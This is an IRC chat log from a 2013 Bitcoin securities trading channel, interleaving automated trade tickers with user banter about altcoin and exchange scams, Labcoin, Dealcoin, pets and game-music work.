[ASICMINER-PT] 1 @ 2.955 BTC [+] Aug 28 17:12:50 http://www.theverge.com/2013/8/28/4667078/ouya-kickstarter-scam-allegations Aug 28 17:12:52 The first Ouya-backed games on Kickstarter might be scams | The Verge Aug 28 17:13:05 lol Aug 28 17:13:08 "might" Aug 28 17:13:30 anatomy of a btcgarden Aug 28 17:13:36 [BTCTC] [BTC-GROWTH] 5 @ 0.09762 = 0.4881 BTC [+] Aug 28 17:13:38 [BTCTC] [BTC-GROWTH] 40 @ 0.09761 = 3.9044 BTC [-] Aug 28 17:13:39 [BTCTC] [BTC-GROWTH] 25 @ 0.0976 = 2.44 BTC [-] Aug 28 17:13:40 [BTCTC] [BTC-GROWTH] 2 @ 0.09712 = 0.1942 BTC [-] Aug 28 17:13:42 [BTCTC] [BTC-GROWTH] 1 @ 0.09615 BTC [-] Aug 28 17:13:42 they show how most raised was from 4 accounts Aug 28 17:13:43 [BTCTC] [BTC-GROWTH] 1 @ 0.094 BTC [-] Aug 28 17:13:44 [BTCTC] [BTC-GROWTH] 14 @ 0.09391 = 1.3147 BTC [-] Aug 28 17:13:44 [BTCTC] [BTC-GROWTH] 12 @ 0.0939 = 1.1268 BTC [-] Aug 28 17:14:09 btcgrowth hasnt even invested his fund money and people selling it off Aug 28 17:14:11 heh Aug 28 17:14:12 [BTCTC] [ASICMINER-PT] 3 @ 2.955 = 8.865 BTC [+] Aug 28 17:14:27 "BACKERS INCLUDE A WOMAN WHO HAS BEEN REPORTED AS MISSING SINCE 2011" Aug 28 17:14:31 lolol Aug 28 17:14:46 bitcoin needs to up its game Aug 28 17:15:00 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Aug 28 17:15:08 [BTCTC] [LABCOIN] 12 @ 0.003101 = 0.0372 BTC [-] Aug 28 17:15:10 [BTCTC] [LABCOIN] 40 @ 0.0031 = 0.124 BTC [-] Aug 28 17:15:11 [BTCTC] [LABCOIN] 10 @ 0.0031 = 0.031 BTC [-] Aug 28 17:15:12 [BTCTC] [LABCOIN] 7 @ 0.003061 = 0.0214 BTC [-] Aug 28 17:15:14 [BTCTC] [LABCOIN] 30 @ 0.00306 = 0.0918 BTC [-] Aug 28 17:15:15 [BTCTC] [LABCOIN] 12 @ 0.003056 = 0.0367 BTC [-] Aug 28 17:15:16 [BTCTC] [LABCOIN] 50 @ 0.003055 = 0.1528 BTC [-] Aug 28 17:15:17 [BTCTC] [LABCOIN] 139 @ 0.00304 = 0.4226 BTC [-] Aug 28 17:15:40 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Aug 28 17:16:11 [BTCTC] [TAT.ASICMINER] 24 @ 0.0287 = 0.6888 BTC [+] Aug 28 17:16:21 [BTCTC] [TAT.ASICMINER] 5 @ 0.0287 = 0.1435 BTC [+] Aug 28 17:16:24 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Aug 28 17:16:53 [BTCTC] [ASICMINER-PT] 3 @ 2.801 = 8.403 BTC [+] Aug 28 17:17:16 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [+] Aug 28 17:17:32 [BTCTC] [KENILWORTH] 3 @ 0.0018 = 0.0054 BTC [+] Aug 28 17:18:10 [BTCTC] [ASICMINER-PT] 8 @ 2.801 = 22.408 BTC [+] Aug 28 17:20:42 well, no news = bad news Aug 28 17:22:16 [HAVELOCK] [LABCO] 26 @ 0.0033 = 0.0858 BTC [+] Aug 28 17:22:18 [HAVELOCK] [LABCO] 250 @ 0.0033 = 0.825 BTC [+] Aug 28 17:25:18 [HAVELOCK] [XBOND] 3 @ 0.00129499 = 0.0039 BTC [-] Aug 28 17:31:48 [BTCTC] [DMS.PURCHASE] 39 @ 0.0158 = 0.6162 BTC [-] Aug 28 17:32:30 [BTCTC] [DMS.MINING] 162 @ 0.00369 = 0.5978 BTC [+] Aug 28 17:32:32 [BTCTC] [DMS.MINING] 208 @ 0.00374 = 0.7779 BTC [+] Aug 28 17:32:32 [BTCTC] [DMS.MINING] 215 @ 0.00375 = 0.8063 BTC [+] Aug 28 17:32:33 [BTCTC] [DMS.MINING] 10 @ 0.003765 = 0.0377 BTC [+] Aug 28 17:32:34 [BTCTC] [DMS.MINING] 202 @ 0.003768 = 0.7611 BTC [+] Aug 28 17:32:35 [BTCTC] [DMS.MINING] 270 @ 0.003769 = 1.0176 BTC [+] Aug 28 17:32:36 [BTCTC] [DMS.MINING] 5 @ 0.003773 = 0.0189 BTC [+] Aug 28 17:32:38 [BTCTC] [DMS.MINING] 93 @ 0.003774 = 0.351 BTC [+] Aug 28 17:32:52 [BTCTC] [DMS.SELLING] 30 @ 0.01255 = 0.3765 BTC [+] Aug 28 17:32:54 [BTCTC] [DMS.SELLING] 20 @ 0.01255 = 0.251 BTC [+] Aug 28 17:34:02 [BTCTC] [LABCOIN] 1 @ 0.003101 BTC [+] Aug 28 17:34:11 [HAVELOCK] [AM100] 9 @ 0.02689 = 0.242 BTC [+] Aug 28 17:34:14 [HAVELOCK] [AM100] 25 @ 0.0269 = 0.6725 BTC [+] Aug 28 17:39:17 [BTCTC] [LABCOIN] 60 @ 0.003101 = 0.1861 BTC [+] Aug 28 17:40:05 [MPEX] [S.MPOE] 2014 @ 0.00088147 = 1.7753 BTC [+] Aug 28 17:40:06 http://i.imgur.com/S5Pxrbu.jpg Aug 28 17:40:09 [MPEX] [S.MPOE] 5908 @ 0.00088241 = 5.2133 BTC [+] Aug 28 17:40:18 YES Aug 28 17:40:47 I will give props to labcoin for a not horrible logo Aug 28 17:40:54 THis is true. Aug 28 17:41:33 But their relationship with North Korea is simply unacceptable. Aug 28 17:41:44 lol Aug 28 17:42:01 cue a whole meme series Aug 28 17:42:10 labcoin logo on hitler uniform Aug 28 17:42:26 saddam hussein tanks Aug 28 17:42:27 etc Aug 28 17:43:41 http://www.npr.org/blogs/thetwo-way/2013/08/27/216222043/scientists-say-theyve-confirmed-a-new-element Aug 28 17:43:43 Scientists Say They've Confirmed A New Element : The Two-Way : NPR Aug 28 17:44:31 [BTCTC] [DMS.MINING] 154 @ 0.003774 = 0.5812 BTC [+] Aug 28 17:44:33 [BTCTC] [DMS.MINING] 2 @ 0.003774 = 0.0075 BTC [+] Aug 28 17:48:15 [BTCTC] [LABCOIN] 1621 @ 0.00313 = 5.0737 BTC [+] Aug 28 17:54:46 americium... How poetic Aug 28 17:55:00 Well put andrew jackson Aug 28 17:55:17 [BTCTC] [ASICMINER-PT] 7 @ 2.9 = 20.3 BTC [+] Aug 28 17:56:00 [HAVELOCK] [AM100] 10 @ 0.02689 = 0.2689 BTC [-] Aug 28 17:56:43 i'm thinking about doing an ipo about doing a bitcoin business in america. its a really good safe jurisdiction that encourages innovation and new ideas. Aug 28 17:57:10 [HAVELOCK] [AM100] 17 @ 0.0269 = 0.4573 BTC [+] Aug 28 17:57:26 rolls off your tongue like murderer Aug 28 17:57:34 *mass Aug 28 17:58:04 [MPEX] [S.MPOE] 1900 @ 0.00088132 = 1.6745 BTC [-] Aug 28 17:58:05 VanCleef: No other country has so many government agencies looking out for your business Aug 28 17:58:15 [MPEX] [S.MPOE] 2142 @ 0.00088241 = 1.8901 BTC [+] Aug 28 17:58:17 [MPEX] [S.MPOE] 4358 @ 0.00088267 = 3.8467 BTC [+] Aug 28 17:58:54 i think we all need to base our business's in america Aug 28 17:59:07 its really where you want to be in 2020 Aug 28 17:59:15 so much freedom Aug 28 17:59:23 Soak in that freedom Aug 28 17:59:25 No need to pay for security, the NSA has you covered Aug 28 17:59:37 hey is anyone else having issues getting into btctc Aug 28 17:59:42 and backups Aug 28 17:59:43 it says for me "access temporarily denied" Aug 28 17:59:48 anyone know what that means? Aug 28 17:59:56 fbi seized it Aug 28 18:00:12 where is burnside? Aug 28 18:00:20 why the fuck is he being a super sketchoud Aug 28 18:00:24 sketchoid* Aug 28 18:01:42 [HAVELOCK] [AM100] 10 @ 0.02689 = 0.2689 BTC [-] Aug 28 18:01:45 [HAVELOCK] [AM100] 112 @ 0.0269 = 3.0128 BTC [+] Aug 28 18:02:20 [BTCTC] [LABCOIN] 2 @ 0.003257 = 0.0065 BTC [+] Aug 28 18:02:21 [BTCTC] [LABCOIN] 1 @ 0.003258 BTC [+] Aug 28 18:02:22 [BTCTC] [LABCOIN] 90 @ 0.003273 = 0.2946 BTC [+] Aug 28 18:02:24 [BTCTC] [LABCOIN] 169 @ 0.003274 = 0.5533 BTC [+] Aug 28 18:04:14 because he's like 15? Aug 28 18:04:28 [BTCTC] [LABCOIN] 4228 @ 0.003274 = 13.8425 BTC [+] Aug 28 18:04:29 [BTCTC] [LABCOIN] 130 @ 0.003276 = 0.4259 BTC [+] Aug 28 18:04:48 like i said (and burnside said) his behavior is not new Aug 28 18:04:58 only newness is his assertion of it Aug 28 18:05:09 and his reiteration of it Aug 28 18:05:19 isn't it neat how 15 yr. olds can make these websites and deal with all of this money Aug 28 18:05:31 there we go Aug 28 18:05:32 lol Aug 28 18:05:33 the wonder of bitcoin Aug 28 18:05:48 its crazy hey johnnyfootball Aug 28 18:05:55 where the binaries are made of gold Aug 28 18:06:19 haha nice young mao pic Aug 28 18:06:41 15yo's shouldn't be running security exchanges Aug 28 18:07:01 the pic is a nice follow up to the gox'd one Aug 28 18:07:02 thestringpuller you know that has been reported by people for a while Aug 28 18:07:05 apparently it goes away Aug 28 18:07:05 lemme dig it up Aug 28 18:09:11 so there's this kid screaming bloody murder right under my window. i run out to see what the fuck. Aug 28 18:09:14 cat is like "o hai" Aug 28 18:09:25 hehe Aug 28 18:09:30 [BTCTC] [ACTIVEMINING] 2 @ 0.004797 = 0.0096 BTC [+] Aug 28 18:09:33 [BTCTC] [ACTIVEMINING] 948 @ 0.004797 = 4.5476 BTC [+] Aug 28 18:09:34 wife brought home 4 kittens to foster Aug 28 18:09:45 unclear how many go back... Aug 28 18:10:10 lol Aug 28 18:10:26 fosters are scams exactly for this reason. they know all it takes is to get you to take it temporarily. Aug 28 18:10:54 want a few rocks and a sack Aug 28 18:11:49 we already have 6 cats Aug 28 18:12:01 because you're married to the catlady. Aug 28 18:12:14 i happen to also enjoy cats Aug 28 18:12:15 I thought catlady was single... Aug 28 18:12:26 but 6 is my limit Aug 28 18:12:27 Perpetually. Aug 28 18:12:34 fried ones? Aug 28 18:12:46 [MPEX] [S.MPOE] 3820 @ 0.00088079 = 3.3646 BTC [-] Aug 28 18:13:09 i come from a family of beastmasters of sorts Aug 28 18:13:15 we raise awesome pets Aug 28 18:13:26 pet tiger or it didn't happen Aug 28 18:13:44 LOOK AT AU ALL Aug 28 18:13:45 do a rehash of satoshi daemon horse Aug 28 18:13:46 Do you have ferrets TAT? Aug 28 18:13:54 no they stink too much Aug 28 18:13:59 US Aug 28 18:14:04 Then you're no Beastmaster, sir! Aug 28 18:14:10 indeed Aug 28 18:14:12 [BTCTC] [LABCOIN] 100 @ 0.00325 = 0.325 BTC [-] Aug 28 18:14:18 sticky caps Aug 28 18:14:21 i have a pet rooster, it fights n stuff Aug 28 18:14:39 i had a litter trained rabbit Aug 28 18:14:47 that liked to snuggle Aug 28 18:14:53 cute Aug 28 18:15:08 it was scared to walk on anything but carpet Aug 28 18:15:20 so when i came home it would run to the edge of the living room Aug 28 18:15:20 hey never sent me a link to any of your music Aug 28 18:15:42 cuz its not anonymized Aug 28 18:16:05 meh, just pm me a link, i'll keep it to myself Aug 28 18:16:12 ahaha Aug 28 18:16:14 ^ Trust him. Aug 28 18:16:39 [BTCTC] [HOSTED-MINING] 1 @ 0.00279 BTC [-] Aug 28 18:17:17 bored, wanna hear something Aug 28 18:17:21 You going to send him your One Direction playlist tat? Aug 28 18:18:12 nope Aug 28 18:18:18 <<< beatmaker/producer Aug 28 18:18:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.0279 = 0.279 BTC [-] Aug 28 18:18:25 at least til i discovered bitcoin... Aug 28 18:18:32 lol Aug 28 18:18:36 I hear that Aug 28 18:18:43 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Aug 28 18:18:55 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Aug 28 18:19:24 what genre? Aug 28 18:19:28 I think it would be feasible to setup a modern style MMORPG casino, using something like HeroEngine, which was used for Star Wars:The Old Republic Aug 28 18:19:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.02834 = 0.2834 BTC [+] Aug 28 18:19:33 hippity hop Aug 28 18:19:45 ahh cool Aug 28 18:19:54 Guess my tablet died Aug 28 18:20:03 we have similar backgrounds is scary Aug 28 18:20:07 ahh i have a reel i might be able to share, lemme dig that up Aug 28 18:20:12 [BTCTC] [TAT.ASICMINER] 25 @ 0.02835 = 0.7088 BTC [+] Aug 28 18:20:24 yeha sweet Aug 28 18:20:25 Developer licenses for the platform are only $100/year, and they let you use their servers to host it if you let them keep 30% of revenues, or you can pay $70k for licensing and put it on your own servers Aug 28 18:21:08 i might buy some exclusive licences off you tat :P Aug 28 18:21:17 [BTCTC] [HOSTED-MINING] 1 @ 0.00279 BTC [-] Aug 28 18:21:20 [BTCTC] [TAT.ASICMINER] 33 @ 0.02835 = 0.9356 BTC [+] Aug 28 18:21:35 i had some interest in doing game music Aug 28 18:21:36 A group of developers could pool together the licensing fee and develop the game with provably fair methods at a 5% house advantage, then crowdsource the betting pool ala just-dice, keeping 2% for themselves for management and maintenance Aug 28 18:21:42 even did some free stuff for a friend Aug 28 18:21:50 but like i said, bitcoin Aug 28 18:21:50 nice Aug 28 18:21:59 There's plenty of money to be made with gaming music atm Aug 28 18:22:11 there is? Aug 28 18:22:19 [BTCTC] [ASICMINER-PT] 5 @ 2.9 = 14.5 BTC [+] Aug 28 18:22:28 i remember in 2005 there was Aug 28 18:22:35 Yes, with the explosion of smartphone gaming, tablets and just regular gaming in general Aug 28 18:22:51 that' been around for a while tho Aug 28 18:23:04 when ringtones are worth more than a mp3 Aug 28 18:23:07 [BTCTC] [ASICMINER-PT] 5 @ 2.9 = 14.5 BTC [+] Aug 28 18:23:19 make more money making lil ringtones and selling them to phone companies Aug 28 18:23:32 There's still a big market for that too Aug 28 18:23:44 true, that's good, i thought it was dead Aug 28 18:23:45 [BTCTC] [TAT.MINIGAME] 10 @ 0.000231 = 0.0023 BTC [+] Aug 28 18:23:52 I have a close friend that doesn gaming music, as well as his own band work too Aug 28 18:24:30 very cool Aug 28 18:24:31 [BTCTC] [HOSTED-MINING] 1 @ 0.00279 BTC [-] Aug 28 18:24:35 The problem with my idea is assembling a team that's both interested and qualified Aug 28 18:24:51 just go to india parseval Aug 28 18:24:57 put together whatever team you want cheaply Aug 28 18:25:09 What are you trying to do parseval? Aug 28 18:25:30 I'm just speculating on an MMO casino, using modern MMO technology Aug 28 18:25:48 Should of jumped that minecraft bandwagon Aug 28 18:25:49 parseval so buy s.mg shares :D Aug 28 18:25:56 [BTCTC] [LABCOIN] 270 @ 0.003249 = 0.8772 BTC [-] Aug 28 18:26:27 s.mg would probalby make more just pumping out iphone apps al day Aug 28 18:27:17 the microtx market is really tough. Aug 28 18:27:29 if you don't get enough playerbase to catch at least one whale you make zero Aug 28 18:27:40 if you get only one whale you make a little over a few weeks then he leaves. Aug 28 18:28:02 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Aug 28 18:28:04 to get a few so they can play together you need to spend a bunch on advertising to chase away all the other scammors implementing the same model. Aug 28 18:28:56 Start up a kickstarter, and blah blah blah Aug 28 18:29:25 you can probably make some dollars begging on kickstarter. Aug 28 18:29:30 [BTCTC] [ASICMINER-PT] 2 @ 2.9 = 5.8 BTC [+] Aug 28 18:29:34 you can probably make more scamming bitcoiners with fake assets. Aug 28 18:29:35 The differentiator would be the technology being used and provable fairness.. HeroEngine, for example, is what SWTOR is built on. Build on that platform and other sites like Dragon's Tale would fold up as their players move to the modern, provably fair game Aug 28 18:29:42 you make even more with legitimate assets, which is where i am Aug 28 18:30:04 What exactly are SMG building, anyway? Aug 28 18:30:04 Ahh the HeroEngine Aug 28 18:30:05 parseval dragon's tale example is what keeps me away from your mmo rpg casino idea. Aug 28 18:30:10 the game is practically dead in the water. Aug 28 18:30:27 it has a few kids trying to work the engine for fractions of 0.001 btc Aug 28 18:30:35 and otherweise... nothing doing. Aug 28 18:31:13 It is, but that's due to the way it's implemented.. I'd give people things to do for free, or rewards for certain rakeback percentages, character customizations, etc Aug 28 18:31:46 Maybe something for them to do when they are broke, so they don't just spend their paycheck and leave, then not come back until their next paycheck Aug 28 18:32:09 [BTCTC] [LABCOIN] 780 @ 0.003259 = 2.542 BTC [+] Aug 28 18:32:31 Kind of a Free to Play model with a casino twist Aug 28 18:32:31 Transaction fees of course, you'll make plenty there Aug 28 18:32:33 eulora is going to have game-y things, but meshed in Aug 28 18:32:34 ahem, Burnside Aug 28 18:33:43 [BTCTC] [ASICMINER-PT] 3 @ 2.9 = 8.7 BTC [+] Aug 28 18:37:45 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Aug 28 18:38:52 [BTCTC] [LABCOIN] 298 @ 0.00326 = 0.9715 BTC [+] Aug 28 18:43:21 [BTCTC] [LABCOIN] 1 @ 0.00321 BTC [-] Aug 28 18:43:22 [BTCTC] [LABCOIN] 2510 @ 0.00315 = 7.9065 BTC [-] Aug 28 18:43:24 [BTCTC] [LABCOIN] 5666 @ 0.003135 = 17.7629 BTC [-] Aug 28 18:43:29 found the beat reel Aug 28 18:43:36 [BTCTC] [ACTIVEMINING] 1 @ 0.00477 BTC [-] Aug 28 18:43:38 [BTCTC] [DMS.MINING] 300 @ 0.0036 = 1.08 BTC [-] Aug 28 18:43:57 well it's mostly snippets from one production Aug 28 18:44:22 [BTCTC] [LABCOIN] 700 @ 0.003297 = 2.3079 BTC [+] Aug 28 18:44:35 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Aug 28 18:45:00 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Aug 28 18:45:02 [BTCTC] [ASICMINER-PT] 7 @ 2.83 = 19.81 BTC [-] Aug 28 18:45:03 [BTCTC] [ASICMINER-PT] 3 @ 2.81 = 8.43 BTC [-] Aug 28 18:45:03 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Aug 28 18:45:04 [BTCTC] [ASICMINER-PT] 10 @ 2.8 = 28 BTC [-] Aug 28 18:45:32 [BTCTC] [ASICMINER-PT] 1 @ 2.792 BTC [-] Aug 28 18:45:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.028 BTC [-] Aug 28 18:46:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.02721 = 0.1088 BTC [-] Aug 28 18:46:09 [BTCTC] [TAT.ASICMINER] 21 @ 0.0272 = 0.5712 BTC [-] Aug 28 18:46:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.02701 = 0.081 BTC [-] Aug 28 18:46:21 [BTCTC] [DMS.MINING] 10 @ 0.00358 = 0.0358 BTC [-] Aug 28 18:46:22 [BTCTC] [TAT.ASICMINER] 15 @ 0.027 = 0.405 BTC [-] Aug 28 18:46:59 [BTCTC] [DMS.MINING] 159 @ 0.00355 = 0.5645 BTC [-] Aug 28 18:48:07 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [+] Aug 28 18:49:42 [HAVELOCK] [HIM] 3 @ 0.1763 = 0.5289 BTC [-] Aug 28 18:49:45 [HAVELOCK] [HIM] 1 @ 0.1762 BTC [-] Aug 28 18:49:47 [HAVELOCK] [HIM] 1 @ 0.1761 BTC [-] Aug 28 18:49:49 [HAVELOCK] [HIM] 4 @ 0.17530042 = 0.7012 BTC [-] Aug 28 18:49:51 [HAVELOCK] [HIM] 3 @ 0.17520001 = 0.5256 BTC [-] Aug 28 18:49:53 [HAVELOCK] [HIM] 20 @ 0.1752 = 3.504 BTC [-] Aug 28 18:49:56 [HAVELOCK] [HIM] 8 @ 0.175 = 1.4 BTC [-] Aug 28 19:00:49 [HAVELOCK] [AM100] 12 @ 0.0265 = 0.318 BTC [-] Aug 28 19:00:52 [HAVELOCK] [AM100] 13 @ 0.0269 = 0.3497 BTC [+] Aug 28 19:00:55 [BTCTC] [ACTIVEMINING] 29 @ 0.004758 = 0.138 BTC [-] Aug 28 19:00:56 [BTCTC] [ACTIVEMINING] 128 @ 0.004601 = 0.5889 BTC [-] Aug 28 19:00:58 [BTCTC] [ACTIVEMINING] 28 @ 0.0046 = 0.1288 BTC [-] Aug 28 19:00:59 [BTCTC] [ACTIVEMINING] 815 @ 0.0046 = 3.749 BTC [-] Aug 28 19:02:53 [BTCTC] [LABCOIN] 1000 @ 0.003292 = 3.292 BTC [-] Aug 28 19:02:54 [BTCTC] [LABCOIN] 400 @ 0.003294 = 1.3176 BTC [+] Aug 28 19:03:27 [BTCTC] [DMS.MINING] 4 @ 0.003774 = 0.0151 BTC [+] Aug 28 19:05:45 [HAVELOCK] [XBOND] 1 @ 0.00129 BTC [-] Aug 28 19:06:03 Dealcoin now eh Aug 28 19:06:40 more scamcoin! Aug 28 19:06:52 another exchangescam Aug 28 19:06:59 How does dealcoin make moneyu Aug 28 19:06:59 But we'll see Aug 28 19:07:10 Fees probably Aug 28 19:07:11 i finally get it, labcoin, that's a good one Aug 28 19:08:50 [BTCTC] [DMS.MINING] 2 @ 0.003774 = 0.0075 BTC [+] Aug 28 19:11:30 labcoin, turning stocks into altcoins since 2013 Aug 28 19:11:39 ;) Aug 28 19:11:42 there's also the little coinlab joke in there Aug 28 19:12:01 btc-e has labcoin Aug 28 19:12:01 it's almost like they encypted hints Aug 28 19:12:10 so as not to reel in non-idiots Aug 28 19:12:27 call your company bittcoin Aug 28 19:12:42 bitcon Aug 28 19:12:56 heh even better Aug 28 19:13:11 good name for a scammer's tell-all book Aug 28 19:13:14 the i is silent Aug 28 19:13:26 the i is u Aug 28 19:14:04 confessions of a bitcon whale Aug 28 19:14:05 [BTCTC] [BASIC-MINING] 1 @ 0.2061 BTC [-] Aug 28 19:14:23 [BTCTC] [LABCOIN] 100 @ 0.003161 = 0.3161 BTC [-] Aug 28 19:15:55 [BTCTC] [DMS.SELLING] 7 @ 0.0121 = 0.0847 BTC [-] Aug 28 19:15:56 [BTCTC] [BASIC-MINING] 1 @ 0.206 BTC [-] Aug 28 19:16:43 [BTCTC] [MININGCO.ETF] 1 @ 0.1198 BTC [-] Aug 28 19:17:16 [BTCTC] [ASICMINER-PT] 1 @ 2.791 BTC [-] Aug 28 19:17:42 [BTCTC] [LABCOIN] 100 @ 0.00329 = 0.329 BTC [+] Aug 28 19:17:43 [BTCTC] [LABCOIN] 111 @ 0.00329 = 0.3652 BTC [+] Aug 28 19:17:43 [BTCTC] [LABCOIN] 1000 @ 0.003291 = 3.291 BTC [+] Aug 28 19:17:45 [BTCTC] [LABCOIN] 319 @ 0.003292 = 1.0501 BTC [+] Aug 28 19:19:06 Someone brought cookies into work Aug 28 19:19:16 mmmm cookies Aug 28 19:19:37 [BTCTC] [TAT.ASICMINER] 7 @ 0.02839 = 0.1987 BTC [+] Aug 28 19:20:14 its a trap Aug 28 19:20:22 [BTCTC] [TAT.ASICMINER] 11 @ 0.02839 = 0.3123 BTC [+] Aug 28 19:26:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.027 = 0.054 BTC [-] Aug 28 19:27:07 [HAVELOCK] [AM100] 33 @ 0.026 = 0.858 BTC [-] Aug 28 19:27:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.02695 BTC [-] Aug 28 19:27:36 [BTCTC] [TAT.ASICMINER] 7 @ 0.02694 = 0.1886 BTC [-] Aug 28 19:27:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.02691 = 0.0538 BTC [-] Aug 28 19:27:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.0269 = 0.269 BTC [-] Aug 28 19:27:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0269 BTC [-] Aug 28 19:27:57 [BTCTC] [TAT.ASICMINER] 6 @ 0.02685 = 0.1611 BTC [-] Aug 28 19:27:58 [BTCTC] [TAT.ASICMINER] 32 @ 0.02684 = 0.8589 BTC [-] Aug 28 19:27:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.02683 = 0.5366 BTC [-] Aug 28 19:28:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.02682 = 1.341 BTC [-] Aug 28 19:28:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.0268 BTC [-] Aug 28 19:28:01 [BTCTC] [TAT.ASICMINER] 50 @ 0.0268 = 1.34 BTC [-] Aug 28 19:28:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0267 BTC [-] Aug 28 19:28:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.02667 = 0.0533 BTC [-] Aug 28 19:28:05 [BTCTC] [TAT.ASICMINER] 14 @ 0.02666 = 0.3732 BTC [-] Aug 28 19:28:05 "Dealcoin does not charge any commission on the trades and is not involved in any fiat currency trades." but how do they make money? Aug 28 19:28:17 Donations Aug 28 19:28:30 wat Aug 28 19:28:35 [BTCTC] [ACTIVEMINING] 1 @ 0.004764 BTC [+] Aug 28 19:28:43 idk i just made that up Aug 28 19:28:47 Socialism Aug 28 19:28:51 I asked the same question before Aug 28 19:29:13 howdo they make money? Aug 28 19:29:17 one word: volume. just like first citiwide change bank Aug 28 19:29:18 [BTCTC] [BASIC-MINING] 2 @ 0.2061 = 0.4122 BTC [+] Aug 28 19:29:18 by ipoing, aint that clear? Aug 28 19:29:25 kinda funny asking someone that is literally making money how they make money Aug 28 19:29:41 Dealcoin generates revenues from the subscription fees paid in Bitcoin by dealer accounts. Aug 28 19:30:13 [MPEX] [S.MPOE] 6350 @ 0.00087775 = 5.5737 BTC [-] Aug 28 19:30:28 go mpoe Aug 28 19:30:32 go gp Aug 28 19:30:42 (i'm assuming dealcoin is some kinda altcoin scheme) Aug 28 19:31:04 or is it something by Groupon? Aug 28 19:31:19 no Aug 28 19:31:24 its a in person trading site Aug 28 19:31:24 no it's like localbitcoins Aug 28 19:31:42 why is it better than localbitcoins Aug 28 19:31:54 who is having regulatory problems last I hard Aug 28 19:31:55 good question Aug 28 19:32:01 it isnt Aug 28 19:32:02 http://i.imgur.com/PLfBLg6.png Aug 28 19:32:04 its just another one Aug 28 19:32:07 labcoin chips Aug 28 19:32:10 Dwolla has already sut them out Aug 28 19:32:22 [BTCTC] [DMS.MINING] 5 @ 0.00355 = 0.0178 BTC [-] Aug 28 19:32:24 dwolla cuts out anyone dealing coins for USD Aug 28 19:32:43 dwolla seizuressss Aug 28 19:33:12 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.001 = 0.021 BTC [-] Aug 28 19:33:48 http://kryptotrader.com/ Aug 28 19:33:50 KryptoTrader Aug 28 19:35:05 what is this? Aug 28 19:35:12 tickers? Aug 28 19:35:38 https://bitcointalk.org/index.php?topic=282680.0 Aug 28 19:35:58 [KRYPTOTRADER] A Realtime Trading Tool for BTCT and LitecoinGlobal Aug 28 19:36:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001 BTC [-] Aug 28 19:36:29 it should allow bitcoin view for ltcg stuff Aug 28 19:36:41 convert price via btc-e or such Aug 28 19:37:20 since ltc is basically a layer over btc anyway Aug 28 19:37:22 has am div data been realsed yet? Aug 28 19:37:26 no Aug 28 19:37:32 [BTCTC] [DMS.PURCHASE] 1 @ 0.01598 BTC [+] Aug 28 19:37:35 shieeet Aug 28 19:37:38 would be funny if no div Aug 28 19:37:43 lolz Aug 28 19:37:45 jesus Aug 28 19:37:49 hehe Aug 28 19:38:06 price could fall just from me saying the idea Aug 28 19:38:11 shhh Aug 28 19:38:20 [HAVELOCK] [AM100] 1 @ 0.026 BTC [-] Aug 28 19:38:21 no divs? Aug 28 19:38:24 ill put out the word Aug 28 19:38:27 yeah no divs this week Aug 28 19:39:01 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001 = 0.003 BTC [-] Aug 28 19:39:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.0263 BTC [-] Aug 28 19:39:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0262 BTC [-] Aug 28 19:39:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.026 BTC [-] Aug 28 19:39:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.02581 = 0.0516 BTC [-] Aug 28 19:39:19 crash! Aug 28 19:39:21 opps Aug 28 19:39:36 AM investors are butthurt because the share didn't continue the straight path from lower left corner to upper right corner in a 45 angle degree Aug 28 19:39:44 [BTCTC] [DMS.MINING] 3 @ 0.0034 = 0.0102 BTC [-] Aug 28 19:39:58 i thought asicminer share price was infinity like bitcoin price is Aug 28 19:40:06 do you take tips gecko? Aug 28 19:40:16 [BTCTC] [DMS.PURCHASE] 1 @ 0.01598 BTC [+] Aug 28 19:40:30 never have Aug 28 19:41:11 [BTCTC] [NASTY-PT] 1 @ 0.002078 BTC [-] Aug 28 19:41:25 [BTCTC] [BASIC-MINING] 3 @ 0.206 = 0.618 BTC [-] Aug 28 19:41:25 [BTCTC] [BASIC-MINING] 1 @ 0.2053 BTC [-] Aug 28 19:41:27 [BTCTC] [BASIC-MINING] 5 @ 0.2052 = 1.026 BTC [-] Aug 28 19:41:28 [BTCTC] [BASIC-MINING] 1 @ 0.2021 BTC [-] Aug 28 19:41:29 [BTCTC] [BASIC-MINING] 6 @ 0.202 = 1.212 BTC [-] Aug 28 19:41:30 [BTCTC] [ACTIVEMINING] 783 @ 0.004753 = 3.7216 BTC [-] Aug 28 19:41:31 [BTCTC] [ACTIVEMINING] 1481 @ 0.004754 = 7.0407 BTC [+] Aug 28 19:41:32 [BTCTC] [BASIC-MINING] 2 @ 0.2011 = 0.4022 BTC [-] Aug 28 19:41:33 [BTCTC] [BASIC-MINING] 10 @ 0.201 = 